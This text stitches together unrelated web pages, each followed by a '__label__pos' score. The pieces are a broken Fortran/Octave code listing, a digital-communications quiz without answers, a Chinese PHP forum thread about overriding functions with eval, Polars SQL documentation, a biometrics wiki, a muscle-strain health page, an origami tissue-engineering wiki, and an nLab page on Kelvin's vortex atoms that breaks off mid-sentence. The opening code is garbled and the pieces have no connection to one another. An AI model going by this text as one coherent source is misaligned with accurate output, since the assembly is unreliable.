 645 y(i) = yh(i,1) 470  CALL f(neq, tn, y, savf) 471  nfe = nfe + 1 472  DO 650 i = 1,n 473  650 yh(i,2) = h*savf(i) 474  ipup = miter 475  ialth = 5 476  IF (nq .EQ. 1) go to 200 477  nq = 1 478  l = 2 479  iret = 3 480  go to 150 481 C----------------------------------------------------------------------- 482 C All returns are made through this section. H is saved in HOLD 483 C to allow the caller to change H on the next step. 484 C----------------------------------------------------------------------- 485  660 kflag = -1 486  go to 720 487  670 kflag = -2 488  go to 720 489  680 kflag = -3 490  go to 720 491  690 rmax = 10.0e0 492  700 r = 1.0e0/tesco(2,nqu) 493  DO 710 i = 1,n 494  710 acor(i) = acor(i)*r 495  720 hold = h 496  jstart = 1 497  RETURN 498 C----------------------- END OF SUBROUTINE SSTODE ---------------------- 499  END F77_RET_T F77_REAL &F77_RET_T F77_DBLE &F77_RET_T F77_REAL &F77_RET_T F77_DBLE &F77_RET_T F77_REAL &F77_RET_T F77_DBLE &F77_RET_T const F77_REAL const F77_REAL F77_REAL &F77_RET_T const F77_DBLE const F77_DBLE F77_DBLE &F77_RET_T F77_REAL &F77_RET_T F77_DBLE &F77_RET_T F77_DBLE &F77_RET_T F77_REAL &F77_RET_T F77_REAL &F77_RET_T F77_DBLE &F77_RET_T const F77_DBLE F77_DBLE &F77_RET_T const F77_REAL F77_REAL &F77_RET_T F77_REAL F77_REAL &F77_RET_T F77_DBLE F77_DBLE &F77_RET_T const F77_DBLE const F77_DBLE * f subroutine scfode(METH, ELCO, TESCO) Definition: scfode.f:1 may be zero for pure relative error test tem the relative tolerance must be greater than or equal to Definition: Quad-opts.cc:233 OCTAVE_EXPORT octave_value_list etc The functions then dimension(columns) charNDArray max(char d, const charNDArray &m) Definition: chNDArray.cc:228 OCTAVE_EXPORT octave_value_list return the value of the option it must match the dimension of the state and the relative tolerance must also be a vector of the same length tem it must match the dimension of the state and the absolute tolerance must also be a vector of the same length The local error test applied at each integration step is xample roup abs(local error in x(i))< subroutine sstode(NEQ, Y, YH, NYH, YH1, EWT, SAVF, ACOR, WM, IWM, F, JAC, PJAC, SLVS) Definition: sstode.f:1 charNDArray min(char d, const charNDArray &m) Definition: chNDArray.cc:205
__label__pos
0.800252
M-ary Modulation This set of Digital Communications Multiple Choice Questions & Answers (MCQs) focuses on “M-ary modulation and amplifiers”. 1. In M-ary FSK, as M increases error a) Increases b) Decreases c) Does not get effected d) Cannot be determined 2. In M-ary FSK as M tends to infinity, probability of error tends to a) Infinity b) Unity c) Zero d) None of the mentioned 3. For non coherent reception of PSK _____ is used. a) Differential encoding b) Decoding c) Differential encoding & Decoding d) None of the mentioned 4. Which modulation technique have the same bit and symbol error probability? a) BPSK b) DPSK c) OOK d) All of the mentioned 5. An amplifier uses ______ to take input signal. a) DC power b) AC power c) DC & AC power d) None of the mentioned 6. Which has 50% maximum power efficiency? a) Class A b) Class B c) Class AB d) None of the mentioned 7. Which generates high distortion? a) Class A b) Class B c) Class C d) Class AB 8. Class B linear amplifiers have maximum power efficiency of a) 50% b) 75% c) 78.5% d) None of the mentioned 9. Which has the maximum power efficiency? a) Class A b) Class B c) Class C d) Class AB 10. Free space in idealization which consists a) Transmitter b) Receiver c) Transmitter & Receiver d) None of the mentioned Leave a Reply Your email address will not be published.
__label__pos
0.963423
热搜:前端 nest neovim nvim 如何用自定义函数文件对另一个php里的函数重写 lxf2024-04-03 22:06:02 为了不修改程序的系统文件,防止以后升级后修改过的文件会给升级时覆盖,所以想自己新建一个自定义函数库文件:extention.php ,在系统运行时 include这个extention.php进去,这样就可以在extention.php 里面对系统函数进行修改也可以在extention.php里面写自己的函数。 比如 有这样3个php文件 a.php 系统的函数库文件,不可以修改它 extention.php 自己自定义的函数库文件,随便添加和修改 result.php 调用函数库里面的方法文件 a.php function show() { $str = 'this is a'; return $str; } extention.php 我在里面也写一个 show()的函数,想去修改a.php里面的show()方法 function show() { $str = 'this is my extention a'; return $str; } result.php 这里include了上面2个php文件,并调用show()方法 include 'a.php'; include 'extention.php'; $result = show(); echo $result; 这样访问result.php 会报 Cannot redeclare的错误。 网上找了资料说可以用 命名空间,但是好像效果不是我想要的。 我是想不去动系统的函数库文件,比如上面的那个a.php;只修改我的extention.php自定义函数库文件,从而能对a.php里面的函数进行修改。不知道能否做到呢? 回复讨论(解决方案) 继承系统的函数库 然后写一个一样的函数名 a.php function show() { $str = 'this is a'; return $str; } extention.php 我在里面也写一个 show()的函数,想去修改a.php里面的show()方法 class extention extends a{  function show()  {   $str = 'this is my extention a';   return $str;  } } 两个选择: 1、 命名空间 2、直接修改目标函数 你的a.php 应该不是全都不可以改的吧。 建议使用 PHP的命名空间来调用同名函数。 举个例子。 test/b.php namespace testb;function test(){ return 'b.php';} test/c.php namespace testc;function test(){ return 'c.php';} test/a.php 来调用 include('b.php');include('c.php');echo \testb\test();echo \testc\test(); 不可以! 你的设想是在php中是不可实现的,因为 php 不支持重载 楼上提及的 命名空间 虽然可以缓解这一矛盾 但是并不适合的的应用场景,因为你不打算修改原系统代码,而函数的调用又是原系统发起的 我在设计可重载的系统函数的时候,使用的是以下的方案: 系统函数定义为: <?phpfunction show() { if (function_exists('ext_show')) { ext_show(); return; } echo 'abc';} “重写”函数则为: <?phpfunction ext_show(){ echo 'ext_abc';} 但是跟你现在的需求还是有差别的,那么我们可以考虑先用程序处理一下a.php,以下是方案的简单测试代码: a.php <?phpfunction show() { echo 'a.php';}function get() { echo 'a.php->get';} extention.php <?phpfunction show() { echo 'extention.php';} result.php <?phpinclude 'extention.php';//include 'a.php';$a = file_get_contents('a.php');$a = str_replace(array('<?php', '?>'), '', $a);$a = str_replace(array("\r\n", "\r", "\n"), '', $a);$a = str_replace('function ', PHP_EOL.'function ', $a);$a_fun = explode(PHP_EOL, $a);$new_a = '';foreach($a_fun as $fun) { if (preg_match('|function\s(.*?)\(|i', $fun, $match)) { $fun_name = trim($match[1]); if (!function_exists($fun_name)) { $new_a .= $fun.PHP_EOL; } }}eval($new_a);show(); 这个还可以优化为: 先判断是否存在 a.runtime.php 文件,如果不存在,执行上面的处理过程,将$new_a写入到 a.runtime.php 然后include进来
__label__pos
0.928328
Skip to content SELECT In Polars SQL, the SELECT statement is used to retrieve data from a table into a DataFrame. The basic syntax of a SELECT statement in Polars SQL is as follows: SELECT column1, column2, ... FROM table_name; Here, column1, column2, etc. are the columns that you want to select from the table. You can also use the wildcard * to select all columns. table_name is the name of the table or that you want to retrieve data from. In the sections below we will cover some of the more common SELECT variants register · execute df = pl.DataFrame( { "city": [ "New York", "Los Angeles", "Chicago", "Houston", "Phoenix", "Amsterdam", ], "country": ["USA", "USA", "USA", "USA", "USA", "Netherlands"], "population": [8399000, 3997000, 2705000, 2320000, 1680000, 900000], } ) ctx = pl.SQLContext(population=df, eager_execution=True) print(ctx.execute("SELECT * FROM population")) shape: (6, 3) ┌─────────────┬─────────────┬────────────┐ │ city ┆ country ┆ population │ │ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 │ ╞═════════════╪═════════════╪════════════╡ │ New York ┆ USA ┆ 8399000 │ │ Los Angeles ┆ USA ┆ 3997000 │ │ Chicago ┆ USA ┆ 2705000 │ │ Houston ┆ USA ┆ 2320000 │ │ Phoenix ┆ USA ┆ 1680000 │ │ Amsterdam ┆ Netherlands ┆ 900000 │ └─────────────┴─────────────┴────────────┘ GROUP BY The GROUP BY statement is used to group rows in a table by one or more columns and compute aggregate functions on each group. execute result = ctx.execute( """ SELECT country, AVG(population) as avg_population FROM population GROUP BY country """ ) print(result) shape: (2, 2) ┌─────────────┬────────────────┐ │ country ┆ avg_population │ │ --- ┆ --- │ │ str ┆ f64 │ ╞═════════════╪════════════════╡ │ Netherlands ┆ 900000.0 │ │ USA ┆ 3.8202e6 │ └─────────────┴────────────────┘ ORDER BY The ORDER BY statement is used to sort the result set of a query by one or more columns in ascending or descending order. execute result = ctx.execute( """ SELECT city, population FROM population ORDER BY population """ ) print(result) shape: (6, 2) ┌─────────────┬────────────┐ │ city ┆ population │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═════════════╪════════════╡ │ Amsterdam ┆ 900000 │ │ Phoenix ┆ 1680000 │ │ Houston ┆ 2320000 │ │ Chicago ┆ 2705000 │ │ Los Angeles ┆ 3997000 │ │ New York ┆ 8399000 │ └─────────────┴────────────┘ JOIN register_many · execute income = pl.DataFrame( { "city": [ "New York", "Los Angeles", "Chicago", "Houston", "Amsterdam", "Rotterdam", "Utrecht", ], "country": [ "USA", "USA", "USA", "USA", "Netherlands", "Netherlands", "Netherlands", ], "income": [55000, 62000, 48000, 52000, 42000, 38000, 41000], } ) ctx.register_many(income=income) result = ctx.execute( """ SELECT country, city, income, population FROM population LEFT JOIN income on population.city = income.city """ ) print(result) shape: (6, 4) ┌─────────────┬─────────────┬────────┬────────────┐ │ country ┆ city ┆ income ┆ population │ │ --- ┆ --- ┆ --- ┆ --- │ │ str ┆ str ┆ i64 ┆ i64 │ ╞═════════════╪═════════════╪════════╪════════════╡ │ USA ┆ New York ┆ 55000 ┆ 8399000 │ │ USA ┆ Los Angeles ┆ 62000 ┆ 3997000 │ │ USA ┆ Chicago ┆ 48000 ┆ 2705000 │ │ USA ┆ Houston ┆ 52000 ┆ 2320000 │ │ USA ┆ Phoenix ┆ null ┆ 1680000 │ │ Netherlands ┆ Amsterdam ┆ 42000 ┆ 900000 │ └─────────────┴─────────────┴────────┴────────────┘ Functions Polars provides a wide range of SQL functions, including: • Mathematical functions: ABS, EXP, LOG, ASIN, ACOS, ATAN, etc. • String functions: LOWER, UPPER, LTRIM, RTRIM, STARTS_WITH,ENDS_WITH. • Aggregation functions: SUM, AVG, MIN, MAX, COUNT, STDDEV, FIRST etc. • Array functions: EXPLODE, UNNEST,ARRAY_SUM,ARRAY_REVERSE, etc. For a full list of supported functions go the API documentation. The example below demonstrates how to use a function in a query query result = ctx.execute( """ SELECT city, population FROM population WHERE STARTS_WITH(country,'U') """ ) print(result) shape: (5, 2) ┌─────────────┬────────────┐ │ city ┆ population │ │ --- ┆ --- │ │ str ┆ i64 │ ╞═════════════╪════════════╡ │ New York ┆ 8399000 │ │ Los Angeles ┆ 3997000 │ │ Chicago ┆ 2705000 │ │ Houston ┆ 2320000 │ │ Phoenix ┆ 1680000 │ └─────────────┴────────────┘ Table Functions In the examples earlier we first generated a DataFrame which we registered in the SQLContext. Polars also support directly reading from CSV, Parquet, JSON and IPC in your SQL query using table functions read_xxx. execute result = ctx.execute( """ SELECT * FROM read_csv('docs/src/data/iris.csv') """ ) print(result) shape: (150, 5) ┌──────────────┬─────────────┬──────────────┬─────────────┬───────────┐ │ sepal_length ┆ sepal_width ┆ petal_length ┆ petal_width ┆ species │ │ --- ┆ --- ┆ --- ┆ --- ┆ --- │ │ f64 ┆ f64 ┆ f64 ┆ f64 ┆ str │ ╞══════════════╪═════════════╪══════════════╪═════════════╪═══════════╡ │ 5.1 ┆ 3.5 ┆ 1.4 ┆ 0.2 ┆ Setosa │ │ 4.9 ┆ 3.0 ┆ 1.4 ┆ 0.2 ┆ Setosa │ │ 4.7 ┆ 3.2 ┆ 1.3 ┆ 0.2 ┆ Setosa │ │ 4.6 ┆ 3.1 ┆ 1.5 ┆ 0.2 ┆ Setosa │ │ … ┆ … ┆ … ┆ … ┆ … │ │ 6.3 ┆ 2.5 ┆ 5.0 ┆ 1.9 ┆ Virginica │ │ 6.5 ┆ 3.0 ┆ 5.2 ┆ 2.0 ┆ Virginica │ │ 6.2 ┆ 3.4 ┆ 5.4 ┆ 2.3 ┆ Virginica │ │ 5.9 ┆ 3.0 ┆ 5.1 ┆ 1.8 ┆ Virginica │ └──────────────┴─────────────┴──────────────┴─────────────┴───────────┘
__label__pos
0.906526
Biometrics Written by: Ethel Macasias Biometrics is primarly used for identification and verification purposes. Biometric recognition is the study of methods for uniquely recognizing a person based on one or more physical or behavioural characteristic. Biometric recognition is being used in conjunction with various forms of technologies for authentication purposes. Some of these technologies include smart cards, magnetic stripe cards and physical keys.   Contents Biometric Methods There are two types of biometrics, physical and behavioural. Behavioural biometrics is usually used for verification and physical biometrics is usually used for determining or verifying ones identity. Various methods of biometrics stem from both the physical and behavioural biometric types. Some of these biometric recognition methods are mentioned below. Iris Iris patterns are randomly formed, thus a person's left and right eye are different. Scanning of the iris is used to measure the iris pattern in the coloured part of the eye. The iris is very distinctive and robust, which provides quick results for both identification and verification purposes. Retinal The measuring of blood vessel patterns from the back of an eye is considered to be retinal scanning. However, retinal scanning is not yet readily available because some find this biometric system to be disturbing, since it involves the person to stand very still while a light source is shined in their eye. Facial The recording of spatial geometry of facial features are used for facial recognition. Since a person's face can be captured from a distance by a camera many casinos, stores and urban areas use facial recognition to identify potential crimes. Voice Vocal characteristics are used to identify pass-phrases used by a person. Telephones and microphones are easily available and cheap, which are used as sound sensors involved with voice recognition. However, voice recognition can be easily affected by background noise. As technology continues to develop voice recognition is becoming more reliable. Fingerprint Fingerprint biometrics is widely used by law enforcement agencies. The details of a digital fingerprint is removed for fingerprint pattern analysis. There are currently three main applications for fingerprint recognition. The first one is used by law enforcement agencies and is known as the Automated Finger Imaging Systems (AFIS). The other two main applications are for fraud prevention and access into computers and other physical items. Hand Geometry Hand geometry involves the geometry of the dimensions of a hand. Therefore, spatial geometry is used after the person places their hand on a scanner. This method of biometrics has a low degree of distinctiveness, therefore it is not widely used for identification purposes. Signature Dynamic signatures are verified by measuring an individual's signature. This method of biometrics studies the speed, direction, pressure and the total time it took for the person to create the signature. As well this method can determine where the stylus was raised and lowered from the writing surface. Keystrokes This method of biometrics examines a person's keystrokes on a keyboard. This method can determine the speed, pressure, total time to type particular words and time between hits on specific keys. This method is still in the development stage to improve robustness and distinctiveness. How Biometrics Works Your fingerprints, retina scans and voice recognition are all biological properties. These unique human characteristics are being used in conjunction with other forms of technology for identification and verification purposes. Most biometric systems measure and record biometric characteristics of a person and matches the results to a database which contains information about individual people. Biometric systems compare unique human characteristics against a database which contains information of many individuals. The matching of information occurs between a person's human characteristic and data from a database. Biometric systems involve both one-to-one and one-to-many matches. Verification, also known as authentication, uses one-to-one matches, whereas identification uses one-to-many matching. There are two types of human characteristics used for biometric recognition, physical and behavioural. Fingerprints, hand geometry, facial and iris recognitions are various forms of physiological biometrics which are measured to derive specific data to identify an individual. Voice verification, keystroke dynamics, signatures and an individual's actions are forms of behavioural characteristics, which are also measured to obtain information to directly or indirectly verify a person's identity. Advantages and Disadvantages Advantages Biometric systems use the unique human characteristics of an individual. For this reason there is an extremely low probability for two humans to share the same biometric data. Furthermore, biometric characteristics of a person are near impossible to duplicate and can only be altered or lost due to a serious accident. Biometrics has proven to be a secure method to ensure data integrity, therefore, many banks, businesses and governments have incorporated biometrics as part of their security procedures. Disadvantages There are two types of recognition errors, False Accept Rate (FAR) and False Reject Rate (FRR). FAR is considered to be the most serious recognition error, which occurs when biometric data does not match, but are accepted as a match by the system. FRR is when biometric data that matches is rejected by the system. This recognition error can be caused by incorrect alignment or dirt on scanner. Current Uses Governments, law enforcement, banks and various businesses are incorporating biometric identifiers to increase security measures. • Law enforcement uses fingerprint tests for the identification of prisoners, and the USA has already started using iris recognition as well. • Some Automatic Teller Machines (ATM) have iris recognition in sensor cameras for people to access their bank accounts. • Nationwide Building in Britain has replaced the use of PIN numbers in their bank machines with iris recognition. • Standard Bank in South Africa used fingerprint verification on their ATMs. • Heathrow airport added iris scanners as part of their security screening process. • Laptops and cell phones have fingerprint recognition to prevent access for unknown users. • plusID personal biometric devices work with physical and logical security systems for increased security. • Pay-by-Touch allows a person to make purchases with your finger. • U.S. Department of Homeland Security has implemented US-VISIT to verify the person entering the US is the some person who received a visa by comparing the person's digital photograph and fingerprint with their database. • Walt Disney World has installed fingerprint scanners to ensure one ticket is being used by the same person upon each entry. • See Also • Iris Biometric System • Iris Recognition • Retina • Facial Recognition • Speech Recognition • Fingerprint • Hand Geometry • Keystroke Dynamics • Authentication • References 1. National Centre for State Courts (2002). "An Overview of Biometrics". Retrieved on March 23, 2007 [1] 2. Michigan State University (2007). "Biometric Research". Retrieved on March 23, 2007 [2] 3. University of Ottawa (January 2007). "Biometrics". Retrieved on March 23, 1007 [3] 4. Biometric Newsportal.com (2007). "Benefits of Biometircs"[4] 5. Woodward Jr., J.D., Horn, C., Gatune, J. & Thomas, A. (2003) Biometrics: A Look at Facial Recognition.Pittsburgh: RAND.[5] • Biometrics: A Security Makeover • Current Uses of Biometrics • Biometric Security Barely Skin-Deep • National Biometric Security Project • Biometrics and Security • Walt Disney World: The Government's Tomorrowland? • Last Revised: April 6, 2007
__label__pos
0.839928
Font Size A A A Muscle Strain (cont.) What Specialists Treat Muscle Strains? Muscle strains are commonly treated by primary-care providers, including family medicine doctors, internists, and general practitioners. Other doctors who can be involved in caring for patients with muscle strains include emergency physicians, physiatrists, orthopedists, sports-medicine doctors, and rheumatologists. Ancillary caregivers who can be involved in caring for muscle strain injuries include physical therapists, massage therapists, and chiropractors. How Do Doctors Diagnose a Muscle Strain? The doctor will take a medical history and perform a physical exam. The examination is generally all that is needed for diagnosis and can help to establish whether the muscle is partially or completely torn. A higher degree or grade of strain (grades 1-3) can involve longer healing, possible surgery, and a more complicated recovery. X-rays or laboratory tests are often not necessary, unless there was a history of trauma or evidence of infection. Infrequently, the physician may order a CT or MRI to better assess the diagnosis of the injury. Medically Reviewed by a Doctor on 11/20/2017 Must Read Articles Related to Muscle Strain CT Scan (CAT Scan, Computerized Axial Tomography) CT Scan What is a CT scan? Computerized tomography scans (CT scans) are important diagnostic tools for a variety of medical conditions. Some areas of the body frequentl...learn more >> Magnetic Resonance Imaging (MRI) Magnetic Resonance Imaging (MRI) Magnetic resonance imaging (MRI) is a scanner that takes cross-sectional images of the body. It is used to evaluate tissues of the head, neck, chest, limbs, abd...learn more >> Sprains and Strains Sprains and Strains An injury to a ligament is called a sprain, while an injury to a muscle or tendon is called a strain. Symptoms and signs include pain, swelling, bruising, and d...learn more >> Patient Comments & Reviews The eMedicineHealth doctors ask about Muscle Strain: Muscle Strain - Treatment What treatment has been effective for your muscle strain? Muscle Strain - Recovery Time How long did it take for you to recover from your muscle strain? Read What Your Physician is Reading on Medscape Medial Gastrocnemius Strain » A medial calf injury is a musculotendinous disruption of varying degrees in the medial head of the gastrocnemius muscle that results from an acute, forceful push-off with the foot. Read More on Medscape Reference » Medical Dictionary
__label__pos
0.646531
Origami Tissue Engineering, by Adam Ramey From OpenWetWare Revision as of 15:07, 29 March 2013 by Shelly Peyton (talk | contribs) (New page: {{Template:ChemEng590B}} ==Overview== Many bodily tissues lack the ability to self repair in the case of injury. Further there are regularly far less tissues and organs available from do...) (diff) ← Older revision | Latest revision (diff) | Newer revision → (diff) Jump to: navigation, search File:575 web header 2-01.tif       Home                 Documents               Assignments               Wiki Schedule                 Wiki Pages                 Course Syllabus Overview Many bodily tissues lack the ability to self repair in the case of injury. Further there are regularly far less tissues and organs available from donors than are needed by patients. This discrepancy highlights the need to develop cost effective and viable tissue replacements. During early development stem cells differentiate and commit to become different tissues and organs based on environmental stimuli. The fate of cells is controlled by concentration gradients, mechanical stimuli, and the relative position of cells to one another. Many strategies to make viable tissue replacements is based on mimicking the in vivo stimuli during early development. Scientists can very easily grow cells on a 2 dimensional plane, but are far less experienced at producing non homogenous 3-dimmensional cultures similar to those produced by nature. As a result researchers have pursued origami tissue engineering as a means of turning 2-dimmensional cell layers into 3-dimmensional complex structures. The central idea behind origami tissue engineering is that a complex 3-dimmensional structure can be formed by a series of simple folding operations, as in traditional origami. By studying folding patterns and means of producing folds, the tissue engineer will gain a means of producing 3-d structures from the 2-d cultures, they are so well versed at making. For example, stents that are used for clearing up clogged blood vessels, need to start out small (to fit through small passages and catheters), and end up large. Therefore, by knowing an optimal folding pattern, the size of the initial folded stent can be reduced significantly. There are many other similar applications that use efficient fold patterns for biological and medical applications. History The art of Origami began in Japan around the Edo Period. Since then, people have been fascinated by the complex three dimensional structures that they could make out of a two dimensional sheet of paper. Artists began to make marvelous masterpieces causing their designs to be more and more complex. For a short amount of time in the mid 1900's, origami seemed to have reached its potential. This was until the involvement of mathematicians. These mathematicians devised intricate models for trying to explain the folding process, and derive different folding patterns. With the use of these new algorithms and models, fold patterns could be optimized to create smaller shapes or shapes with way more detail. Scientist and engineers caught on quickly to the mathematically perfect patterns and began using them for their structures and devices. • 1603: Origami evolves as an art form in Japan • 1900s: Origami artist begin to create more complex designs • 1980s: Mathematicians start applying mathematical models to make even more intricate designs • 1990: Robert Lang (Caltech) begins to study and apply these models to every day applications • 2003: Zhong You and Kaori Kuribayashi (Oxford Univ.) develop an origami stent • 2005: Zhong You and Kaori Kuribayashi innovate their stent so that it is self deployable Applications Stents Traditional wire stent[B] TiNi foil stent[C] Kaori Kuribayashi and Zhong You from the university of Oxford, UK have created stentgrafts made out of a Ni-rich titanium/nickel foil that utilizes origami folding. Traditional wire stents often result in restenosis due to their porous/mesh nature[4]. Restenosis occurs when tissues grow through the pores of the emsh and create blockages[5]. Because the stent graft is made of TiNi foil with no holes, no tissue in-growth can occur. In addition the stent grafts deploy as a result of a change in temperature. The transition temperature can be controlled by altering the amount of nickel used in the foil. Once the stent reaches the desired destination in the artery or vein, it is pushed out of the catheter where it will expand to its full size without the use of a traditional balloon. The automatic deployment works by two different mechanisms: one is triggered by heat (of the body for example) while the other is triggered solely due to the super elastic behavior of the material[1]. Material Qualities & Preparation The different etched patterns on the top and bottom of the foil created by negative photoelectric etching.[D] This Ni-rich Ti/Ni foil falls under a class of materials called a shape-memory alloy(SMA) which means that the material always wants to return to the shape at which it was cold forged. Having a material be a SMA is ideal for origami engineering since it will want to spring back to its original shape after being folded. Another wonderful property of this material is that it is biocompatable with the body and will induce no negative immune response[6]. The reason why such materials were not used before, is because it was very challenging and expensive to make a TiNi foil (or another biocompatable SMA) so thin while retaining its properties. Now due to research from the early 2000's, it is possible to create such a material relatively inexpensively[1]. To tailor program the cylindrical shape memory Kuribayashi and You aged the material at 773k for 20-40h[1]. Next a folding pattern is devised and creases are applied to the foil by using a negative photo-chemical etching process[1]. Following the rules of origami, different patterns were made on either side side of the foil. Once the foil was etched, all that needed to be done to fold the stent was to sub cool it using liquid nitrogen. Folding occurs because the foil contracts at cold temperatures, and the foil buckles at points where there is less stress. Points of less stress for these stents are the etched lines. Results In a simple experiment where a tube the diameter of a catheter was used to implant the stent into a second tube the diameter of an artery, the stent expanded quickly and effectively. In fact the speed of the unfolding was so fast that a high speed camera was needed to capture the motion. The tube that was meant to mimic the artery must reach 319 K before the stent would deploy[1]. Unfortunately this is above body tempeature, but may be altered by changes the relative amount of Nickel and Titanium Unfolding stent. Images from a high speed camera of the TiNi origami stent unfolding.[E] Origami Alveoli Origami alveoli are a model to study the way alveoli work. The reason for using an origami model is that the shape of alveoli changes with time. This requires a model that also can change shape with time, which is also known as a 4D model. First a mathematical model was created that mimicked the motions of each moving part in the alveoli. Next an origami model was built of the duct and the alveoli to be able to visually see the impacts of different conditions.[7] Alveoli. An origami model for an alveolus[F] Cell Origami Two different 3D structures created by CTF Scientists from the University of Tokyo, Japan designed an experiment that created a self folding cell-laden micro-structure. They named this new method, "Self-Folding Cell Origami". The premise was to use a force that cells exerted naturally, the cell traction force (CTF), in order to make a controlled three dimensional structure. In their experiments, the researchers coated glass plates with a gel that cells could not attach to. They then placed micro plates on the plate a short distance apart. Cells were then seeded on the micro plates. The cells then bridged the gap and pulled against each other, creating a 3-d structure. Further studies showed that the fold angle directly correlated to the number of cell attachments spanning the gap between micro plates. Researchers were able to create a box, a tube, and a dodecahedron structure, by altering the micro plate pattern and by change the number of cells seeded[2]. These preliminary results provide a strong basis for further research into producing 3-d structure from 2-d cell sheets. Schematic of the whole process. Below is an image of the actin stained in green and the nucleus in blue ]=== DNA Origami === DNA origami refers to the self assembly of hundreds of oligonucleotide into well defined 3-dimmensional structures. Shawn Douglas has used this technique o create a nano robot using DNA origami. A 35 nm X 35 nm x 45 nm barrel was produced by annealing a 7308 base pair template strand with 196 oligonucleotide base strands. The robot was designed using cadnano, a computer aided design program specifically for DNA origami. The robot is capable of selectively interacting with cells by sensing antigens and releasing a payload as a result. The barrel is held shut by a DNA locking mechanism made of two semi-complementary DNA strands. When the antigen comes enar this domain, the semi-complementary sequence will release form the sequence complimentary to the antigen and the barrel springs open delivering its payload. This DNA origami nano robot has obvious applications for drug delivery and cell culture experiments. References 1. K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical applicationof Ni-rich TiNi shape memory alloy foi. Materials Science and Engineering 2006, A 419, 131-137. 2. K. Kuribayashi-Shigetomi, H. Onoe and S. Takeuch SELF-FOLDING CELL ORIGAMI: BATCH PROCESS OF SELF-FOLDING 3D CELL-LADEN MICROSTRUCTURES ACTUATED BY CELL TRACTION FORCE. MEMS 2012, 72. 3. Tae Soup Shim, Shin-Hyun Kim, Chul-Joon Heo, Hwan Chul Jeon, and Seung-Man Yang Controlled Origami Folding of Hydrogel Bilayers with Sustained Reversibility for Robust Microcarrier. Angew. Che 2012, 124, 1449-1452. 4. E.R. Edelman, C. Rogers, Circulation 94 (1996) 1199–1202. 5. M. Gottsauner-Wolf, D.J. Moliterno, A.M. Lincoff, E.J. Topol, Clin. Cardiol. 19 (1996) 347–356. 6. J. Ryhanen, Biocompatibility evaluation of nickel–titanium shape memory metal alloy, in: Dissertation, University Hospital of Oulu, Oulu,1999 7. H. Kitaoka et al. Origami Model for Breathing Alveol, Advances in Experimental Medicine and Biology, 669, 2010 49-52 IMAGES [A] <http://www.sciencemag.org.silk.library.umass.edu/content/332/6036/1376/F2.expansion.html> [B] <http://news.injuryboard.com/johnson-amp-johnson-wins-patent-case-on-heart-stents.aspx?googleid=28948> [C] K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical applicationof Ni-rich TiNi shape memory alloy foi. Materials Science and Engineering 2006, A 419, 131-137. [D] K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical applicationof Ni-rich TiNi shape memory alloy foi. Materials Science and Engineering 2006, A 419, 131-137. [E] K. Kuribayashi et al. Self-deployable origami stent grafts as a biomedical applicationof Ni-rich TiNi shape memory alloy foi. Materials Science and Engineering 2006, A 419, 131-137. [F] H. Kitaoka et al. Origami Model for Breathing Alveol, Advances in Experimental Medicine and Biology, 669, 2010 49-52 [G]-[H] K. Kuribayashi-Shigetomi, H. Onoe and S. Takeuch SELF-FOLDING CELL ORIGAMI: BATCH PROCESS OF SELF-FOLDING 3D CELL-LADEN MICROSTRUCTURES ACTUATED BY CELL TRACTION FORCE. MEMS 2012, 72. [I]Tae Soup Shim, Shin-Hyun Kim, Chul-Joon Heo, Hwan Chul Jeon, and Seung-Man Yang Controlled Origami Folding of Hydrogel Bilayers with Sustained Reversibility for Robust Microcarrier. Angew. Che 2012, 124, 1449-1452.
__label__pos
0.756459
nLab On Vortex Atoms Contents Context Knot theory Physics physics, mathematical physics, philosophy of physics Surveys, textbooks and lecture notes theory (physics), model (physics) experiment, measurement, computable physics The text • Lord Kelvin, On Vortex Atoms Proceedings of the Royal Society of Edinburgh, Vol. VI, pp. 94-105. 1867 (web) presented the hypothesis that atoms (elementary particles) are fundamentally vortices in some spacetime-filling substance (the “aether”). Review and discussion: Discussion in comparison to knotted states in superconductors: • Filipp N. Rybakov, Julien Garaud, Egor Babaev, Kelvin knots in superconducting state, Phys. Rev. B 100, 094515 (2019) (arXiv:1807.02509) Discussion in relation to skyrmions: • Antonio Ranada, J. Trueba, Force Lines, Vortex Atoms, Topology, and Physics, Section I.A In: Topological Electromagnetism with hidden nonlinearlity in: Myron Evans (ed.) Modern Nonlinear Optics – Part 3, Wiley 2001 (doi:10.1002/0471231495.ch2) Contents Impact As a literal theory of physics the vortex atom hypothesis lasted no more than 30 years, even Thomson himself giving up on it by 1890 (Krage 02, p. 34), but it did make Peter Tait start thinking about classification of knots, which eventually led to modern knot theory in mathematics. Moreover, faint shadows of Kelvin’s original idea have been argued to be visible in string theory – and the failure of the vortex atom theory has been used to warn of too much hope into string theory. Similarity with Descartes’ thoughts According to the Routledge encyclopedia of Philosophy here: Descartes also rejected atoms and the void, the two central doctrines of the atomists, an ancient school of philosophy whose revival by Gassendi and others constituted a major rival among contemporary mechanists. Because there can be no extension without an extended substance, namely body, there can be no space without body, Descartes argued. His world was a plenum, and all motion must ultimately be circular, since one body must give way to another in order for there to be a place for it to enter ( Principles II: §§2–19, 33). Against atoms, he argued that extension is by its nature indefinitely divisible: no piece of matter in its nature indivisible ( Principles II: §20). Yet he agreed that, since bodies are simply matter, the apparent diversity between them must be explicable in terms of the size, shape and motion of the small parts that make them ( Principles II: §§23, 64) (see Leibniz, G.W. §4 ). However, according to (Krage 02, p. 33): In spite of the similarities, there are marked differences between the Victorian theory and Descartes’s conception of matter. Thus, although Descartes’s plenum was indefinitely divisible, his ethereal vortices nonetheless consisted of tiny particles in whirling motion. It was non-atomistic, yet particulate. Moreover, the French philosopher assumed three different species of matter, corresponding to emission, transmission, and reflection of light (luminous, “subtle”, and material particles). The vortex theory, on the other hand, was strictly a unitary continuum theory. Similarity to concepts of modern particle physics Baryogenersis It is however striking that the modern concept of baryogenesis via the chiral anomaly and its sensitivity to instantons is not too far away from Kelvin’s intuition. To play this out in the most pronounced scenario, consider, for the sake of it, a Hartle-Hawking no-boundary spacetime carrying NN Yang-Mills instantons. Notice that an instanton is in a precise sense the modern higher dimensional and gauge theoretic version of what Kelvin knew as a fluid vortex. Then the non-conservation law of the baryon conserved current due to the chiral anomaly says precisely the following: the net baryon number in the early universe is a steadily increasing number – this is the modern mechanism of baryogenesis – such that as one approaches the asymptotically late time after the “Big Bang” this number converges onto the integer NN, the number of instantons. Hence while in the modern picture of baryogenesis via gauge anomaly an elementary particle is not literally identified with 